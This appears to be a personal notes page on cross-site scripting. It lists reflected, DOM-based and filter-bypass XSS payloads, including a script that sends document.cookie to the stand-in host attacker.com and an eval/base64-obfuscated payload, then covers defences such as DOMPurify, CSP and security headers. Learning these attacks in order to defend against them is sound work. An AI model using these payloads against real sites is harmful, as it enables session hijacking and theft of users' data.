Cross site scripting Link to heading

Most common types: reflected, stored, dom-based.

Some general payloads:

# test
<script>alert('XSS')</script>

# html events
<img src="x" onerror="alert('XSS')">
<body onload="alert('XSS')">
<svg onload="alert('XSS')">

# Bypassing filters
<ScRiPt>alert('XSS')</sCriPt> <!-- Mixed case -->
<img src=x onerror="&#97;lert('XSS')"> <!-- HTML entity encoding -->
<iframe src="javascript:alert('XSS')"> <!-- JavaScript in attributes -->

# Stealing cookies
<script>
  fetch('https://attacker.com/steal?data=' + document.cookie);
</script>

# dom-based xss
// If the URL is https://site.com/page#<img src=x onerror=alert('XSS')>
<script>
  var payload = document.location.hash.substring(1);
  document.write(payload); // Unsafe DOM write
</script>

# advanced obfuscation
<script>
  eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPXggb25lcnJvcj1hbGVydCgxKT4iKQ=='));
  // Decodes to: document.write("<img src=x onerror=alert(1)>")
</script>

Protection Link to heading

Libs that can help Link to heading

  • DOMPurify

Best practices code Link to heading

  • Restrict with CSP: Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;
    • Protects against inline scripts, event handlers
  • Avoid unsafe innerHTML, document.write(), eval(), setTimeout(), setInterval()
  • Always convert html content (special chars) to their HTML entities.
  • Some common XSS defense headers:
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
  • d